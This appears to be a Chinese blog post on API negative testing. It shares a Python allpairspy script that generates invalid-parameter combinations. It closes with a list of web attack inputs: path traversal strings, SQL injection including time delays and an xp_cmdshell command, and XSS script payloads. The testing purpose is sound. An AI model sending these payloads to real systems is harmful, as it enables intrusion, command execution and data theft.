- 在介面測試中,經常被各種逆向常見所困擾,之前我都是用的微軟的PICT工具來生成逆向引數,拋開其他缺點不談,主要是隻支援windows
- 下面用python的模組來完成這項操作,下面是簡單demo,可以根據自己實際需要擴充套件
mport uuid
from allpairspy import AllPairs
# pip install allpairspy
from collections import OrderedDict
class BaseFuzzParams(object):
""" 設定介面的逆向引數
自動生成模糊介面引數第一步,提前準備逆向場景
Args:
d: dict型別,正向介面引數
Returns:
dict
Raises:
無
"""
def __get_data(self, d):
data = {}
for i in d:
data[i] = []
# 加入一般規則
data[i].append({"info": "正確的值", "code": 1, "value": d[i], "key": i})
data[i].append({"info": "為空", "code": -1, "value": "", "key": i})
data[i].append({"info": "錯誤的值", "code": -2, "value": self.__param_format(type(d[i])), "key": i})
data[i].append({"info": "刪除", "code": -3, "key": i})
# 加入其它規則:如路徑遍歷,xss,注入
return data
'''
生成逆向場景引數
'''
def __param_format(self, key):
if key == str:
return str(uuid.uuid1())
elif key == int:
return 963852 # 也可以使用隨機整數的方式
elif key == list:
return [str(uuid.uuid1())]
elif key == dict:
return {}
elif key == "inject":
return "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
# 路徑遍歷
elif key == "path_traversal":
pass
else:
return "null"
'''
得到逆向場景引數後,用AllPairs生成全對偶引數
'''
def __set_fuzz(self, d):
data = []
for i, par in enumerate(AllPairs(OrderedDict(d))):
app = []
for j in par:
app.append(j)
data.append(app)
dd = []
for i in data:
d = []
for j in range(len(i)):
d.append(i[j])
dd.append(d)
d2 = []
for i in dd:
d1 = []
for j in i:
app = {}
if j.get("code", -9) == -1:
app[j["key"]] = ""
elif j.get("code", -9) == -3:
pass
else:
app[j["key"]] = j["value"]
app["info"] = j["key"] + j["info"]
d1.append(app)
d2.append(d1)
return d2
'''
對外的函式,處理生成的對偶場景介面引數
Returns:
[{},{}]
'''
def param_fi(self, d):
g_data = self.__get_data(d)
s_fuzz = self.__set_fuzz(g_data)
data = []
for i in s_fuzz:
for j in range(len(i)):
_info = ""
for k in range(len(i)):
_info = _info + "," + i[k]["info"]
i[0].update(i[k])
i[0]["info"] = _info.strip(",")
data.append(i[0])
break
return data
if __name__ == "__main__":
fz = BaseFuzzParams().param_fi({"user": "name", "id": 1001, "pwd": "!@#$^&*", "data": {"test": "hello"}, "my_list":["1", "2"]})
print(fz)
- 還可以加入些其他的逆向場景,如路徑遍歷,注入,超長引數等,舉一些例子供大家參考
- 路徑遍歷
../../../../../../../{FILE}
../../../../../../../../{FILE}
..%2f{FILE}
..%2f..%2f{FILE}
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
ý or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
# cgi
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
AT-admin.cgi
AT-generate.cgi
# xss
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
TRACK
CONNECT